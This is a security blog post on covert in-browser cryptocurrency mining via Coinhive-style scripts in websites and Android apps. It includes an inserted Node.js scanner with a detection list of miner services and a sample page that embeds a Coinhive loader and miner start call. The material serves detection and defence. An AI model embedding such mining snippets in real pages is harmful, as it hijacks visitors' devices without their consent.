
Web-services monetization driven by crypto currency mining in websites and mobile apps

A new era of crypto currency mining via websites and mobile apps

By: Manohar Ghule

 

A paradigm shift has been observed since last month in website monetization techniques. Website monetization is the process of converting traffic sent to a website into revenue. "Pay-Per-Click" advertising, "Selling Ad Space", "Affiliate Marketing" and "Donations" are the most common practices used for monetizing a website. The idea of mining cryptocurrency in a user's browser to monetize a website was introduced by a company called Coinhive. Coinhive provides a JavaScript library that can be invoked within a loaded webpage to start mining the cryptocurrency Monero (XMR) as an alternative source of revenue. As a service fee, Coinhive keeps 30% of the earned XMR and the remaining 70% goes to the site owner. As a result, the user gets an ad-free experience on the webpage at the cost of some CPU cycles, the website owner earns 70% and the mining-service provider gets 30% of the generated XMR: it appears to be a win-win for everyone.

 

This new website monetization tactic has attracted much attention. Torrent sites like "The Pirate Bay," as well as certain porn sites, have quickly adopted it. Similar service providers such as Crypto-loot, CoinBlind, CoinNebula, MineMyTraffic, Jsecoin, Coin-Have, PPoi and Adsencebase have also emerged.

In the month of October, we found around 2K unique domains that had embedded coin-mining JavaScript and ~20K unique URLs churning users' CPUs to generate revenue.

 

Fig 1: Daily unique webpage hit count in Oct-17.

 

Fig 2: Geo-location of hosts/websites that adopted in-browser mining.

 

Fig 3: Geo-location of clients who accessed mining websites.

 

The more time a user spends on the site, the more revenue is generated. Websites providing video streaming and file-sharing services tend to benefit more from in-browser mining, and as a result we are seeing more hits on these types of websites. In addition to sites deploying mining voluntarily, we have also noticed mining deployed on compromised sites – giving the bad guys one more vector that can be abused for financial gain.

 

Fig 4: Top-100 sites based on number of hits.

 

Just as traditional website monetization introduced risks of personal data theft through adware and malvertising, browser mining has opened the door to new types of threats.

From a security perspective, cryptocurrency mining inside browsers is not malicious by itself. However, we observed that this practice is being carried out silently, without the end user's consent or knowledge, which makes it undesirable. Cyber criminals are injecting mining scripts into compromised websites; these scripts secretly consume CPU cycles of a user's laptop or mobile device to mine cryptocurrency whenever the user visits the website. This is a resource-hijack attack, and there is no immediate way to tell that a webpage is consuming the CPU. One site performing mining is likely to degrade the experience on the websites open in other tabs, and multiple webpages mining in parallel in different tabs will drain the CPU entirely. When these kinds of miners are in action, a user will find the computer or mobile device running slower, and the CPU temperature will rise, causing mobiles to overheat, which may damage the device or reduce its life. Additionally, this can result in increased electricity bills for users.

 

Fig 5: CPU Usage in normal conditions.

 

Fig 6: CPU Usage when mining started.

 

Fig 7: Source code of webpage embedded mining script.
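The post notes that a user has no immediate way to tell that a page is mining, and that such pages are being blocked. The following is an added example, not code from the original post or from any of the services it names: a small Node.js scanner that inspects fetched HTML for the indicators described above. Its assumptions are labelled in the code: the loader path `coinhive.com/lib/coinhive.min.js` and the `CoinHive.Anonymous` / `CoinHive.User` constructors are the public Coinhive API as it was documented at the time; the other entries in `MINER_NAME_HINTS` are only the service names the post lists, used as hostname keywords rather than confirmed domains; and the sample pages are constructed for this example.

```javascript
// Added example (not from the original post): flag in-browser mining
// indicators in a fetched HTML document, then map them to a block/review/allow
// verdict like the one the post describes. Runs offline on constructed input.

// Assumption: coinhive.com is the domain Coinhive served its loader from.
const KNOWN_MINER_HOSTS = new Set(['coinhive.com']);

// Service names from the post, lower-cased and matched as substrings of a
// script host name. Heuristic only: these are names, not confirmed domains.
const MINER_NAME_HINTS = ['coinhive', 'crypto-loot', 'coinblind', 'coinnebula',
  'minemytraffic', 'jsecoin', 'coin-have', 'ppoi', 'adsencebase'];

// Inline-script patterns: the constructors the Coinhive library exposed (an
// assumption about its public API at the time), plus the name of Monero's
// proof-of-work algorithm, which miner bundles tend to carry as a string.
const INLINE_PATTERNS = [
  { name: 'coinhive-api', re: /\bCoinHive\.(Anonymous|User)\s*\(/ },
  { name: 'cryptonight', re: /cryptonight/i },
];

const SCRIPT_TAG_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Resolve a script src against the page URL and return its host, or null
// when the src cannot be parsed (nothing to judge by host in that case).
function scriptHost(src, pageUrl) {
  try {
    return new URL(src, pageUrl).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Scan one page. Each finding names the indicator and quotes the evidence so
// an analyst can confirm it rather than trusting the match blindly.
function scanForMiners(html, pageUrl) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG_RE)) {
    const [, attrs, body] = m;
    const srcMatch = attrs.match(SRC_ATTR_RE);
    if (srcMatch) {
      const host = scriptHost(srcMatch[1], pageUrl);
      if (host && KNOWN_MINER_HOSTS.has(host)) {
        findings.push({ indicator: 'known-miner-host', evidence: srcMatch[1] });
      } else if (host && MINER_NAME_HINTS.some((h) => host.includes(h))) {
        findings.push({ indicator: 'miner-name-in-host', evidence: srcMatch[1] });
      }
    }
    for (const p of INLINE_PATTERNS) {
      if (p.re.test(body)) {
        findings.push({ indicator: p.name, evidence: body.trim().slice(0, 80) });
      }
    }
  }
  return findings;
}

// Policy: a confirmed loader host or API call is enough to block the page;
// a name hint alone goes to analyst review; no findings means allow.
const BLOCKING_INDICATORS = new Set(['known-miner-host', 'coinhive-api']);
function verdict(findings) {
  if (findings.some((f) => BLOCKING_INDICATORS.has(f.indicator))) return 'block';
  return findings.length > 0 ? 'review' : 'allow';
}

// Constructed sample pages for this example (not real sites). The first
// follows the shape shown in Fig 7: a loader from the mining service plus an
// inline start call carrying the site owner's key (a placeholder here).
const SAMPLE_PAGES = {
  mining: `<html><body><p>Free streaming</p>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>
    </body></html>`,
  clean: `<html><body><p>Free streaming</p>
    <script src="/static/app.js"></script>
    <script>document.title = 'Player';</script>
    </body></html>`,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, html] of Object.entries(SAMPLE_PAGES)) {
    const findings = scanForMiners(html, 'https://example.com/watch');
    console.log(name, verdict(findings), findings);
  }
}
```

The same scan applies to HTML an Android app loads into a WebView, which is how the mobile cases described later in the post surface. Host matching catches the common case of a hosted loader; the inline patterns are there for pages that bundle the library themselves, and a hit on either confirmed indicator is what drives the block decision.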

 

JavaScript Miners for Mobile

The phenomenon of in-browser JavaScript-based cryptocurrency mining has made its way to Android applications on the Google Play Store too. Researchers found some apps that use Coinhive's service without any notification to the user. When an app with the cryptocurrency miner is opened, it starts consuming resources, leading to reduced battery life and slower performance of the device.

Fig 8: Snapshot of JavaScript code used for mining in an app.

 

One can argue that in-browser mining is a neat and clean alternative to pop-ups and banner ads, because ads are annoying and have their own privacy and security concerns. On the other hand, consuming a user's resources without their consent makes this practice precarious. In our findings, we observed that none of the mining services prompted the user or provided an opt-out option. Therefore, we are blocking such webpages. In response to security concerns about illegitimate mining, Coinhive has also introduced a JavaScript library that provides an opt-out option to users.
